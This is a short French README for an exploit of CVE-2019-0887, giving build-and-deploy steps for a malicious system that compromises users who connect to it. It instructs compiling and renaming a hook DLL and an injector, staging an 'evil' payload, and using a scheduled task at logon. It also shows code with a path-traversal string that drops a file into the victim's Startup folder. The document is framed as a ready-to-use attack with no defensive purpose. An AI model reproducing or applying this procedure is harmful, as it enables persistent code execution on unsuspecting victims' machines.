
exploit pour CVE-2019-0887
Compilez le CVE-2019-0887, renommez-le en winhlp.dll
Compilez Install_Hook, renommez-le en hook.exe
attention, ils doivent être compilés en x64
Placez-les dans le système malveillant comme ceci
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # something evil
si quelqu'un veut changer le chemin, voici où le faire
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
Utilisez peut-être taskschd.msc pour créer une tâche planifiée, définissez un déclencheur "Lors de la connexion à une session utilisateur" et définissez le chemin de hook.exe.
En attendant que des utilisateurs se connectent à mon système malveillant, copient quelque chose, et se fassent pwn...
Astuces : Pourquoi ne pas utiliser le détournement de DLL ?